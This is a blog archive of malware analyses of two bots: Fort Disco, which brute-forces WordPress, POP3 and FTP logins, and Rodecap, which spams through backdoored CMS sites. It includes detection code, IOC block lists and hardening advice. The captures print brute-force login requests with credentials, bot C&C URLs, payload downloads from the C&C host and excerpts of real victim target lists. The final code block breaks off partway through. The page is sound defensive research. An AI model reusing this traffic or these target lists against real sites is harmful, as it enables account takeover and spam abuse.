Archive for the 'Malware & Virus Analysing' Category


Malware With Bruteforce Capabilities

Today I came across an interesting piece of malware that attacks websites running WordPress by guessing user credentials with brute force. Arbor Networks already published an analysis of this threat at the beginning of September under the name Fort Disco. As shown below, however, the brute-force attacks issued by Fort Disco are not limited to content management systems (CMS).

*** The malware ***

The malware copies itself into the All Users profile directory:

C:\Documents and Settings\All Users\Application Data\System\filename-of-the-infection-binary.exe

To be started whenever the infected user logs on, it also creates the following Run value (HKCU, so only that user's logon triggers it):

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\filename-of-the-infection-binary

Digging a little deeper, I found several other samples in my zoo that appear to belong to the same family:


MD5 hash                          Botnet C&C server
c09585e10a5faa7865fe18af370b5e14  hXXp://google-update.pw/cmd.php
bd03abc172becc1cafaf1367aeb67d10  hXXp://google-update.pw/cmd.php
284141c69272444566abe47947e65d1d  hXXp://pizdaprovoda.com/cmd.php
8da5edce85cd55cf36f6d97a7b1f24e7  hXXp://borailibali.com/cmd.php
538a4cedad8791e27088666a4a6bf9c5  hXXp://cureid.pw/cmd.php
c2ec42e5dce6044bf3b07950ccb1b144  hXXp://dedart.ru/cmd.php (thanks to @raashidbhatt)
a25737d6a881fc327ba1b8bdb37cc391  hXXp://my.ololo.in/cmd.php

This particular malware appeared for the first time in my malware zoo on July 1st, 2013.

*** C&C botnet communication ***

The malware uses HTTP POST and HTTP GET to communicate with its C&C infrastructure. Interestingly, the main C&C URL always ends in /cmd.php (see above). When talking to the C&C server, the infected computer (bot) first registers itself by sending an HTTP POST with the body status=0. Note the User-Agent Mozilla/4.0 (compatible; Synapse): that is the default string of the Synapse TCP/IP library for Delphi and Free Pascal, so it is a usable network indicator on its own:

POST /cmd.php HTTP/1.0
Host: google-update.pw
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

status=0

Afterwards the bot can retrieve commands from the botnet herder. If the C&C responds with five zeros (0 0 0 0 0), there is no task for the bot. Otherwise the C&C server responds with something like this:

1
30

http://google-update.pw/pass_bot_pull/1001632.txt

abertxuiop123
480

The C&C server tells the bot that it has a new task, provides a link to a text file (pass_bot_pull/1001632.txt) and a password (abertxuiop123); what the numeric fields 30 and 480 mean is not clear from the capture. A look at the text file the bot retrieves shows what this is all about:

online-kino.kz/admin.php
onlyagame.wbur.org/wp-login.php
onstarshipsanddragonwings.com/wp-login.php
ontariothoroughbred.com/wp-login.php
onokart.wordpress.com/wp-login.php
opemainc.com/administrator/index.php
paddockartstudios.co.uk/wp-login.php
pacificstewardship.com/wp-login.php
pagosaspringscdc.org/wp-login.php
palmlakeestates.org/wp-login.php
panamacityera.com/wp-login.php
palestinehigh.com/wp-login.php
paotothelo.wordpress.com/wp-login.php
paradigmoz.wordpress.com/wp-login.php
parallellogram.com/wp-login.php
pardonjohnnycash.com/wp-login.php
parfumka.pro/wp-login.php
parentingaces.com/wp-login.php
patcrann.wordpress.com/wp-login.php
pastorjimmydean.com/wp-login.php
[...]

The text file contains a list of exactly 5'000 target sites. Nearly all entries point at wp-login.php, the PHP script that handles WordPress authentication, but a few point at login scripts of other CMS (admin.php, Joomla!'s administrator/index.php), so the target list is not strictly WordPress-only.

It's not hard to guess what comes next: the bot walks through the whole list and tries to log in to each site with the user name Administrator and the single password it received from the C&C server. Note the shape of the attack: one password per task, tried once against each of 5'000 sites, so an individual site sees only one attempt from a given bot:

POST /wp-login.php HTTP/1.0
Host: onlyagame.wbur.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Referer: onlyagame.wbur.org/wp-login.php

log=Administrator&pwd=abertxuiop123&redirect_to=onlyagame.wbur.org%2Fwp-admin%2F&testcookie=1

[Figure: WordPress brute-force attempts]

*** Bruteforcing other internet services ***

Going down the rabbit hole, I found a sample of this family (MD5 538a4cedad8791e27088666a4a6bf9c5) that brute-forces POP3 credentials instead of WordPress ones. It starts with an HTTP GET for a user-name list:

GET /login.txt HTTP/1.1
User-Agent: PrototypeB
Host: cureid.pw
Cache-Control: no-cache

Notice the User-Agent PrototypeB, which we haven't seen before. The C&C server's response looks like this:

admin
info
support
admin@{domain}.{zone}
info@{domain}.{zone}
support@{domain}.{zone}

This is the list of user names the bot will later use for the POP3 brute force; the {domain}.{zone} placeholders are presumably filled in with each target domain. Before that, the bot registers itself with the C&C server the same way as before (HTTP POST to /cmd.php with status=0) and then retrieves a task:

1
50
temp_brut/915232.txt
580
921751322

The bot then fetches temp_brut/915232.txt, whose content is quite interesting:

koshcenter.com:mx-caprica.easydns.com
lapantomima.com:mail.lapantomima.com
literarymusings.com:smtp.secureserver.net
nashvillehype.com:nashvillehype.com
kunstplatz.com:mc01.mhs.ch
twangthing.com:smtp.secureserver.net
victorx.com:mx00.1and1.com
julianoakes.com:punt1.th.hotchilli.net
bddrumstudios.com:mx00.1and1.com
axesandalleys.com:mx00.1and1.com
vikingrail.com:smtp.secureserver.net
coverjunkies.com:mail2.bandzoogle.com
arabove.com:aspmx.l.google.com
[...]

The file contains a large list of domain names, each followed by the host that handles the domain's inbound mail according to its MX record (domain:mailhost). The bot then tries to brute-force POP3 credentials for these domains, using the listed mail host as the POP3 server and the user names retrieved before. Since an MX host does not necessarily also serve POP3, many of these attempts will simply fail to connect:
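To make the two task formats concrete, here is a small parser for the /cmd.php task reply and for both target-list formats (the host/login-script lines of the WordPress task and the domain:mailhost lines of the POP3 task). This is an added example written for this write-up, not code from the malware or from abuse.ch; the sample lines are copied from the captures above, the field names are mine, and the meaning of the numeric fields (30, 480, 50, 580, 921751322) is left undetermined because the captures do not explain them.

```python
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass, field
from typing import Optional, Union


@dataclass
class Task:
    list_ref: str                 # URL or path of the target list the bot fetches next
    password: Optional[str]       # present in the WordPress task, absent in the POP3 task
    extra: list[str] = field(default_factory=list)   # numeric fields the captures do not explain


def parse_task(body: str) -> Optional[Task]:
    """Parse a /cmd.php task reply. Returns None for the 'no task' answer (five zeros)."""
    lines = [ln.strip() for ln in body.splitlines() if ln.strip()]
    tokens = " ".join(lines).split()
    if tokens and all(t == "0" for t in tokens):      # "0 0 0 0 0", on one line or several
        return None
    if not lines or lines[0] != "1":
        raise ValueError(f"unexpected task flag: {lines[:1]!r}")
    try:
        idx = next(i for i, ln in enumerate(lines) if ln.endswith(".txt"))
    except StopIteration:
        raise ValueError("task carries no target-list reference") from None
    password = None
    extra: list[str] = []
    # Heuristic from the two captures: numeric fields are opaque, the one non-numeric
    # field is the password. A purely numeric password would be misfiled under extra.
    for fld in lines[1:idx] + lines[idx + 1:]:
        if fld.isdigit():
            extra.append(fld)
        elif password is None:
            password = fld
        else:
            raise ValueError(f"unexpected field: {fld!r}")
    return Task(lines[idx], password, extra)


@dataclass(frozen=True)
class WebTarget:
    host: str
    path: str


@dataclass(frozen=True)
class MailTarget:
    domain: str
    server: str


Target = Union[WebTarget, MailTarget]


def parse_target_list(text: str) -> list[Target]:
    """Decode either list format: 'host/login-script' (web) or 'domain:mailhost' (POP3)."""
    out: list[Target] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("[...]"):
            continue
        if "/" in line:                               # scheme-less URL, as the bot receives it
            host, _, path = line.partition("/")
            out.append(WebTarget(host, "/" + path))
        elif ":" in line:
            domain, _, server = line.partition(":")
            out.append(MailTarget(domain, server))
        else:
            raise ValueError(f"unrecognised target line: {line!r}")
    return out


def login_script_histogram(targets: list[Target]) -> Counter[str]:
    """Count web targets by login script; shows the list is not purely WordPress."""
    return Counter(t.path.rsplit("/", 1)[-1] for t in targets if isinstance(t, WebTarget))


# Lines copied from the captures above (a few of each list).
SAMPLE_WEB_LIST = """\
online-kino.kz/admin.php
onlyagame.wbur.org/wp-login.php
opemainc.com/administrator/index.php
paddockartstudios.co.uk/wp-login.php
[...]
"""

SAMPLE_MAIL_LIST = """\
koshcenter.com:mx-caprica.easydns.com
literarymusings.com:smtp.secureserver.net
arabove.com:aspmx.l.google.com
[...]
"""

if __name__ == "__main__":
    print(parse_task("1\n30\nhttp://google-update.pw/pass_bot_pull/1001632.txt\nabertxuiop123\n480\n"))
    print(login_script_histogram(parse_target_list(SAMPLE_WEB_LIST)))
```

Running it on a full 5'000-line list and looking at the histogram is a quick way to see which login scripts a given task actually targets before writing detection for them.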

[Figure: POP3 brute-force attempts]

While speaking with the guys at Shadowserver, they told me they have seen this malware family brute-forcing FTP credentials with the same methodology.

*** Detecting bruteforce attempts by this malware ***

These brute-force attempts against WordPress are easy to spot. First, the bot sends a malformed Referer header to wp-login.php: for the example above a browser would send http://onlyagame.wbur.org/wp-login.php, whereas the bot omits the scheme (onlyagame.wbur.org/wp-login.php). Second, the bot omits three headers that every standard browser sends with every request: Accept, Accept-Encoding and Accept-Language. Both anomalies are cheap to check in a web server log or a WAF rule; on the network side, the C&C registration stands out by its User-Agent Mozilla/4.0 (compatible; Synapse).

Comparing a real request with a brute-force attempt by this malware side by side:

Bot HTTP header

Host: fredericacade.wordpress.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 302
Referer: fredericacade.wordpress.com/wp-login.php

User HTTP header

Host: fredericacade.wordpress.com
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: da, en-gb;q=0.8, en;q=0.7
Accept-Encoding: gzip, deflate
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 302
Referer: http://fredericacade.wordpress.com/wp-login.php
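As an added example (not part of the original post), the following Python checks a raw wp-login.php POST for exactly the two artefacts described above: a Referer without scheme and the absent Accept headers. The bot request is the one captured above; the browser request is assembled from the "User HTTP header" listing with a request line and body of my own, and the decision rule (either structural anomaly is decisive, the user name is only corroborating) is my choice.

```python
from __future__ import annotations

from dataclasses import dataclass, field

BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding")


@dataclass
class Verdict:
    suspicious: bool
    indicators: list[str] = field(default_factory=list)


def parse_request(raw: str) -> tuple[str, str, dict[str, str], str]:
    """Split a raw HTTP request into (method, target, lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").lstrip("\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def check_login_request(raw: str) -> Verdict:
    """Flag a wp-login.php POST that carries the artefacts of this bot."""
    method, target, headers, body = parse_request(raw)
    if method != "POST" or not target.startswith("/wp-login.php"):
        return Verdict(False)
    indicators: list[str] = []
    referer = headers.get("referer")
    if referer is not None and not referer.lower().startswith(("http://", "https://")):
        indicators.append("referer-without-scheme")
    missing = [h for h in BROWSER_HEADERS if h not in headers]
    if missing:
        indicators.append("missing-" + "+".join(missing))
    if "log=Administrator&" in body + "&":
        indicators.append("login-as-Administrator")   # weak on its own, useful for correlation
    # A real browser always sends the three Accept headers and a Referer with its scheme,
    # so either structural anomaly is decisive; the user name alone is not.
    decisive = [i for i in indicators if i != "login-as-Administrator"]
    return Verdict(bool(decisive), indicators)


# The bot request is the one captured above. The browser request is constructed from the
# "User HTTP header" listing above; request line and body are mine, Content-Length dropped.
BOT_REQUEST = """\
POST /wp-login.php HTTP/1.0
Host: onlyagame.wbur.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Referer: onlyagame.wbur.org/wp-login.php

log=Administrator&pwd=abertxuiop123&redirect_to=onlyagame.wbur.org%2Fwp-admin%2F&testcookie=1
"""

BROWSER_REQUEST = """\
POST /wp-login.php HTTP/1.1
Host: fredericacade.wordpress.com
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: da, en-gb;q=0.8, en;q=0.7
Accept-Encoding: gzip, deflate
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Referer: http://fredericacade.wordpress.com/wp-login.php

log=editor&pwd=correct-horse&redirect_to=http%3A%2F%2Ffredericacade.wordpress.com%2Fwp-admin%2F&testcookie=1
"""

if __name__ == "__main__":
    for name, raw in (("bot", BOT_REQUEST), ("browser", BROWSER_REQUEST)):
        print(name, check_login_request(raw))
```

The same two checks translate directly into a ModSecurity rule pair (one on `REQUEST_HEADERS:Referer` not beginning with `http`, one on the absence of `REQUEST_HEADERS:Accept`) scoped to `REQUEST_URI` `/wp-login.php`; keep the Administrator check out of the blocking rule, since legitimate sites still use that name.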

*** Preventing bruteforce attacks against WordPress ***

Brute-force attacks against WordPress and other content management systems (CMS) are nothing new. In the past few months abuse.ch (which also runs on WordPress) has identified and blocked more than 21'000 brute-force attempts against this blog. Until now such attacks have usually been carried out by Python and Perl scripts hosted on rogue servers; this seems to be one of the first malware families used to brute-force WordPress credentials from infected end-user machines.

In fact it isn't too difficult to blunt these attacks. A few simple things you can do to protect your WordPress site:

  • First of all, enable two-factor authentication on your WordPress site, for example Google Authenticator on your smartphone (which Dropbox, among others, also uses) together with the Google Authenticator plug-in for WordPress. It is easy to set up and not only stops brute-force guessing but also stops criminals from logging in with credentials stolen beforehand (e.g. by a password stealer on your computer).
  • The Limit Login Attempts plug-in limits login attempts per IP address: after a set number of failures (e.g. 4) the address is locked out for a set period (e.g. 24 hours). Be aware of what this does and does not stop: the task format above gives each bot one password for 5'000 sites, so a single site sees one attempt per bot and a per-IP lockout will rarely trigger. Lockouts raise the cost of a scripted attack from one IP far more than that of a distributed one.
  • Restrict access to wp-admin/ and wp-login.php via .htaccess with an additional HTTP Basic authentication user name and password. This not only cuts brute-force attempts but also shields the admin panel from attacks that exploit unpatched WordPress vulnerabilities.
  • Rename the PHP file responsible for WordPress authentication (wp-login.php) to something only you know (e.g. nigol-pw.php). This hides the form from list-driven bots like this one, but it is obscurity only, and WordPress also accepts credentials through XML-RPC (xmlrpc.php), which renaming wp-login.php does not touch; keep the other measures in place.
  • Because the HTTP POST issued by this family is poorly crafted (see the header comparison above), a web application firewall (WAF, for example ModSecurity) can block it on the missing Accept headers or the scheme-less Referer, and will block other known web-based attacks against your site as well.
  • Change the default user name you use to manage your site (do not use Administrator or admin); this bot tries exactly that name.
  • Keep your WordPress site up to date, not only WordPress itself but also all third-party plug-ins. Always run the most recent version of WordPress and of every installed plug-in.
  • Last but not least, have a look at the WordPress Hardening Guide.

*** Conclusion ***

With this malware, cybercriminals have built a way to distribute brute-force attacks not only against WordPress but also against POP3 servers around the world, including those of Google and Outlook.com (formerly Hotmail), and against FTP servers.

What the criminals do with compromised WordPress accounts once they have gained access is unclear at this time. However, last week I read a news article on heise.de (sorry, it's in German) reporting DDoS attacks launched from WordPress blogs. The German Anti-Botnetz-Beratungszentrum suspects (sorry, also in German) that the attacking WordPress sites had previously been hacked by brute force. I'm not sure whether this is related, but it is one scenario for what WordPress sites compromised by this malware could be used for. Either way, this seems to be one of the first malware families with generic brute-force capabilities.

As a side note: both the Emerging Threats and the Sourcefire VRT rulesets for Snort/Suricata already contain signatures for this malware's botnet C&C traffic.

Follow me on Twitter: https://twitter.com/abuse_ch

New Spambot In Town Using Compromised Websites To Send Spam

Today, while digging through my sandnet, I came across a trojan I had never seen before. It caught my attention because it HTTP-POSTs to www.google.com, which is a bit odd (more on this later). So I decided to have a closer look and found 20 binaries in my sandnet showing similar behaviour:

2013-07-21 a1ae35eadf7599d2f661a9ca7f0f2150
2013-07-23 a00fd847d7152d2439251d5e5bf20dca
2013-07-29 a11daf09c9ef63466637a0c97a44ae0e
2013-07-30 289e7c3dd1771a1e0865417f81e2308c
2013-07-30 2f1da170625f1f5e5e9aebf0627abd62
2013-07-30 39e5cad818c033dd4b417593a2c16474
2013-07-30 3acf24d2285ce24f54ea60d33005ac2e
2013-07-30 4dce9885245756c8b159c08ebb660040
2013-07-30 4f5794df9bb22321975bc028038d6194
2013-07-30 6daf4f7a6f7131373ff16e7604555cc3
2013-07-30 75d4f090f80ef2628f659cad707d4b7d
2013-07-30 922260a5adbf1698cf1ab0eb0d40036a
2013-07-30 94bda5fa7c52c24259cdf2b3f7c14ebf
2013-07-30 a4b05e98cf2778fd5f44d5c3f5ff0599
2013-07-31 ab11d73f0de74b48deb7023483b49979
2013-07-31 b36c12525968dd29f23523d8898c4c82
2013-07-31 e9db3ab0f75f339995aecd61ebeb8cb6
2013-07-31 f5b627d158d61034064e71cfdd3eaa41
2013-08-01 47f910f5caf4a886675bdb88a317b9c2
2013-08-01 a29fd30396c564fc40a86b54ec36d602

As shown above, I saw the first binary with this behaviour on 2013-07-21, so the trojan appears to be, at least from my perspective, fairly new. What also made me curious is that only 3 of these 20 binaries are known to VirusTotal. Those that are, however, have quite good AV coverage:

MD5 hash: a1ae35eadf7599d2f661a9ca7f0f2150
AV coverage: 35 / 46

MD5 hash: a00fd847d7152d2439251d5e5bf20dca
AV coverage: 34 / 46

Looking at the AV results, most vendors detect this trojan as Rodecap. Symantec published its write-up on July 23 2013, two days after my sandnet first saw a binary with this behaviour:
https://www.symantec.com/security_response/writeup.jsp?docid=2013-072315-2550-99

*** The Trojan ***
Once a computer is infected, Rodecap copies itself into one of the following directories:

C:\Documents and Settings\USERNAME\Local Settings\Application Data\Microsoft\
C:\Documents and Settings\USERNAME\Local Settings\Application Data\

The trojan copies itself to these directories using one of the following filenames:

cmstp.exe
ieudinit.exe
logman.exe
lsm.exe
mstsc.exe
sessmgr.exe
spoolsv.exe
wininit.exe
winlogon.exe

In addition, Rodecap might also write the following files:

C:\Documents and Settings\All Users\ieudinit.exe
C:\Documents and Settings\All Users\dllhost.exe

To ensure that Rodecap is started each time the user logs on, it creates a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ using one of the following names:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MessageService
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Connection Manager
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Spooler
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Sessmgr
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinLogon

The AV-vendor ESET has documented additional filenames and registry keys used by Rodecap.

*** Rodecap C&C Traffic ***
The botnet C&C communication used by Rodecap is unusual. As mentioned above, Rodecap initially talks to its C&C server while pretending to talk to www.google.com. It also does some other interesting things, described below.

To find the address of the main C&C server, Rodecap looks up the MX record of lyrics-db.org. The response contains two MX records pointing to a different domain name:

DNS query: lyrics-db.org IN MX

DNS response:
13 mx1.games-olympic.org.
17 mx2.games-olympic.org.

Rodecap then obtains the C&C IP address by resolving the A record of one of the referenced MX hosts:

DNS Query: mx1.games-olympic.org IN A
DNS response: 95.163.104.68

[Figure: Rodecap C&C traffic (DNS)]

Rodecap now uses 95.163.104.68 as its C&C server. It goes one step further and puts www.google.com into the HTTP Host header while talking to it, so that the traffic looks like a request to Google in proxy logs and in naive sandbox output. This does not work in a corporate environment with a web proxy, because the proxy resolves www.google.com itself and forwards the request to the real Google:

POST /protocol.php?p=XXX&d=XXX HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.google.com
User-Agent: Mozilla/5.0
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache

d=XXX

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 31 Jul 2013 X
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

*encrypted data*

Judging by the headers, this request goes to www.google.com, but the bot actually sends it to 95.163.104.68, the address obtained earlier through the MX lookup. The IP address belongs to a Russian web hosting company called Digital Networks CJSC (DINET / msm.ru):

inetnum: 95.163.0.0 – 95.163.255.255
netname: RU-DINET-20081230
org: ORG-DNJ1-RIPE
descr: Digital Networks CJSC
admin-c: DNO-RIPE
tech-c: DNO-RIPE
country: RU
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: DN-MNT
mnt-routes: DN-MNT
mnt-domains: DN-MNT
source: RIPE # Filtered

Of course, Google is not hosted in Russia…

Once the bot has contacted the main C&C server, it is told to download additional malware components (PE32 executables):

hXXp://www.google.com/d/conh11.jpg
hXXp://www.google.com/d/fu13.jpg

Again, these files are not hosted on Google but on 95.163.104.68, and despite the .jpg extension they are Windows executables:

[Figure: Rodecap dropping additional binaries]

*** Rodecap spam module ***
What Rodecap drops here is at least one module used for spamming, and it spams in an unusual way. The module first calls a C&C server under newsleter.org to fetch a task from the botnet herder via HTTP GET:

GET /d/t14.php HTTP/1.1
User-Agent: -
Host: t.newsleter.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 31 Jul 2013 X
Content-Type: text/plain
Content-Length: 309
Connection: keep-alive
Keep-Alive: timeout=5
Last-Modified: Mon, 22 Jul 2013 X
ETag: “X”
Accept-Ranges: bytes

*encrypted data*

I've seen the spam module use different subdomains of newsleter.org, hosted on different IP addresses:

t.newsleter.org (95.163.104.93 – AS12695 DINET RU)
bt.newsleter.org (208.115.109.53 – AS23033 Wowrack US)
seek.newsleter.org (208.115.109.53 – AS23033 Wowrack US)
fw.newsleter.org (85.143.166.221 – AS56534 Prix RU)

What Rodecap fetches from these C&Cs is a spam template and a list of hijacked websites (more on that below).

*** CMS PHP backdoor component ***
Unlike other spam botnets, which use stolen SMTP credentials, deliver directly to the victims' mail servers or abuse open SMTP relays, Rodecap uses a huge list of compromised websites that run some kind of PHP backdoor script. Within a few hours I was able to collect more than 3'500 unique websites that appear to run an outdated content management system (CMS, such as Joomla!), have been compromised and host a malicious PHP file. The list of compromised websites I have come across so far that are associated with Rodecap can be found here:

https://www.abuse.ch/downloads/rodecap_compromised_cms.txt

Unfortunately I have not been able to get a copy of such a PHP file yet, but the botnet traffic towards these compromised websites shows that Rodecap sends its spam through them:

[Figure: Rodecap spam module C&C traffic]

The HTTP POST request looks like this:

POST /old/nieuw/plugins/editors/tinymce/jscripts/tiny_mce/plugins/devkit/stats.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.hrmet.nl
Content-Length: 883
Connection: Keep-Alive
Cache-Control: no-cache

*encrypted data*

HTTP/1.1 200 OK
Date: Wed, 31 Jul 2013 X
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Length: 39
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

OK+taskid+0

If the PHP backdoor responds with OK and the task ID, the spam mail was presumably sent successfully. Various compromised websites return the web server's OS name and the task ID instead of just OK, for example:

Linux20+taskid+1 (for webservers running Linux)
WINNT20+taskid+1 (for webservers running Windows, mostly IIS)

If the PHP backdoor cannot deliver the mail (e.g. because the remote mail server rejected it), it reports this back to the bot together with the remote mail server's error message.

Some examples:

Linux20+taskid+4+(dave332453@aol.com)+550 5.1.1 : Recipient address rejected: aol.com|
Linux20+taskid+3+(davehibbeler@hotmail.com)+421 RP-001 (BAY0-MC2-F47) Unfortunately, some messages from 92.53.113.126 weren’t sent. Please try again. We have limits for how many messages can be sent per hour and per day. You can also refer to http://mail.live.com/mail/troubleshooting.aspx#errors.|
Linux20+taskid+2+(davecarter159@yahoo.com)+421 4.7.0 [GL01] Message from (217.21.184.244) temporarily deferred – 4.16.50. Please refer to http://postmaster.yahoo.com/errors/postmaster-21.html|

Judging by the error messages, Rodecap currently targets the big free mail providers such as Windows Live, Yahoo and AOL.

I ran a Rodecap binary in a sandbox for a few minutes and checked the responses from the compromised websites. Based on those responses, most of the spam sent by Rodecap appears to have been accepted by the remote mail servers.
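The reply format is regular enough to parse. The following is an added example (my code, not the bot's or the backdoor's): it splits each reply into prefix, task ID, recipient and SMTP reply, classifies the outcome from the SMTP reply code, and aggregates per recipient domain, which is the view you want when reading a sandbox run like the one just described. The three failure lines are the ones quoted above; the two short lines mirror the OK and WINNT20 forms shown.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Optional

# <prefix>+taskid+<n>                               -> accepted
# <prefix>+taskid+<n>+(<recipient>)+<SMTP reply>|   -> failure, carrying the remote server's reply
REPLY_RE = re.compile(
    r"^(?P<prefix>[A-Za-z]+\d*)\+taskid\+(?P<task>\d+)"
    r"(?:\+\((?P<rcpt>[^)]*)\)\+(?P<smtp>(?P<code>\d{3})\b.*?))?\|?$"
)


@dataclass
class BackdoorReply:
    prefix: str                  # "OK", "Linux20", "WINNT20"
    task_id: int
    recipient: Optional[str]
    smtp_code: Optional[int]
    smtp_reply: Optional[str]

    @property
    def server_os(self) -> Optional[str]:
        base = re.sub(r"\d+$", "", self.prefix)
        return {"Linux": "Linux", "WINNT": "Windows"}.get(base)   # "OK" carries no OS

    @property
    def outcome(self) -> str:
        if self.smtp_code is None:
            return "accepted"
        if 400 <= self.smtp_code < 500:
            return "deferred"    # 4xx: temporary failure, the recipient may be retried
        if 500 <= self.smtp_code < 600:
            return "rejected"    # 5xx: permanent failure
        return "unknown"

    @property
    def recipient_domain(self) -> Optional[str]:
        return self.recipient.rpartition("@")[2].lower() if self.recipient else None


def parse_reply(line: str) -> BackdoorReply:
    m = REPLY_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised backdoor reply: {line!r}")
    code = m.group("code")
    return BackdoorReply(m.group("prefix"), int(m.group("task")), m.group("rcpt"),
                         int(code) if code else None, m.group("smtp"))


def summarise(lines: Iterable[str]) -> tuple[Counter, dict[str, Counter]]:
    """Outcome counts overall and per recipient domain."""
    overall: Counter = Counter()
    per_domain: dict[str, Counter] = {}
    for line in lines:
        r = parse_reply(line)
        overall[r.outcome] += 1
        if r.recipient_domain:
            per_domain.setdefault(r.recipient_domain, Counter())[r.outcome] += 1
    return overall, per_domain


# The three failure lines are quoted from the captures above; the two short lines
# reproduce the OK and WINNT20 forms shown there.
SAMPLE_REPLIES = [
    "OK+taskid+0",
    "WINNT20+taskid+1",
    "Linux20+taskid+4+(dave332453@aol.com)+550 5.1.1 : Recipient address rejected: aol.com|",
    "Linux20+taskid+3+(davehibbeler@hotmail.com)+421 RP-001 (BAY0-MC2-F47) Unfortunately, some messages from 92.53.113.126 weren’t sent. Please try again. We have limits for how many messages can be sent per hour and per day. You can also refer to http://mail.live.com/mail/troubleshooting.aspx#errors.|",
    "Linux20+taskid+2+(davecarter159@yahoo.com)+421 4.7.0 [GL01] Message from (217.21.184.244) temporarily deferred – 4.16.50. Please refer to http://postmaster.yahoo.com/errors/postmaster-21.html|",
]

if __name__ == "__main__":
    overall, per_domain = summarise(SAMPLE_REPLIES)
    print(overall)
    for domain, counts in per_domain.items():
        print(domain, dict(counts))
```

Note that an "accepted" reply only means the compromised web server handed the mail to the next hop without an immediate SMTP error; a later bounce would not show up in these replies.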

*** Conclusion ***
This new threat is just another spam bot in the wild. However, it uses methods for C&C communication and for sending spam that I have not seen before, and the idea is quite good: there are tens of thousands of websites out there running vulnerable (unpatched) CMSes that can easily be exploited to plant malicious software on the victim's web space. The Rodecap gang seizes this opportunity to install a PHP backdoor that lets them send mail through the compromised web servers. Because the spam then originates from web hosting addresses, the criminals avoid common blacklists, in particular those listing dynamic end-user IP space (DSL/cable subscribers) such as the Spamhaus PBL or SORBS DUL.

To defend your network against this new threat, you should:

  • Block the exact HTTP User-Agent strings "Mozilla/5.0" and "-" on your web proxy (match the whole string: a real browser's User-Agent starts with Mozilla/5.0 but is much longer)
  • Ensure that your CMS is up to date and running the latest version

In addition, you might also want to block the C&C communication associated with Rodecap going to the following destinations:

lyrics-db.org
games-olympic.org
mx1.games-olympic.org
mx2.games-olympic.org
newsleter.org
t.newsleter.org
bt.newsleter.org
seek.newsleter.org
fw.newsleter.org
95.163.104.68
95.163.104.93
208.115.109.53
85.143.166.221

UPDATE 2013-08-02 11:15 UTC
A reader of abuse.ch contacted me and suggested blocking 95.163.64.0/18 entirely, which belongs to Digital Network JSC (DI-NET Russia). According to him, this block has caused no false positives in the last two years.
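As an added example (not from the original post), the following Python matches HTTP proxy or flow records against the indicators listed above and adds the check that actually catches the www.google.com decoy: the Host header names a domain that does not resolve to the destination IP. The resolver is injected so the example runs offline; the sample records and the stand-in address 203.0.113.10 for www.google.com are constructed, not observed.

```python
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Callable, Iterable

# Indicators taken from the lists above.
IOC_DOMAINS = {"lyrics-db.org", "games-olympic.org", "newsleter.org"}  # zone match covers subdomains
IOC_IPS = {"95.163.104.68", "95.163.104.93", "208.115.109.53", "85.143.166.221"}
IOC_NETS = [ipaddress.ip_network("95.163.64.0/18")]                    # the reader-suggested block
BARE_USER_AGENTS = {"Mozilla/5.0", "-"}                                 # exact match, as advised above


@dataclass(frozen=True)
class HttpRecord:
    dst_ip: str
    host_header: str
    user_agent: str
    path: str


def in_zone(name: str, zone: str) -> bool:
    name = name.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)


def ioc_hits(rec: HttpRecord) -> list[str]:
    hits: list[str] = []
    if any(in_zone(rec.host_header, z) for z in IOC_DOMAINS):
        hits.append("ioc-domain")
    if rec.dst_ip in IOC_IPS:
        hits.append("ioc-ip")
    elif any(ipaddress.ip_address(rec.dst_ip) in net for net in IOC_NETS):
        hits.append("ioc-net")
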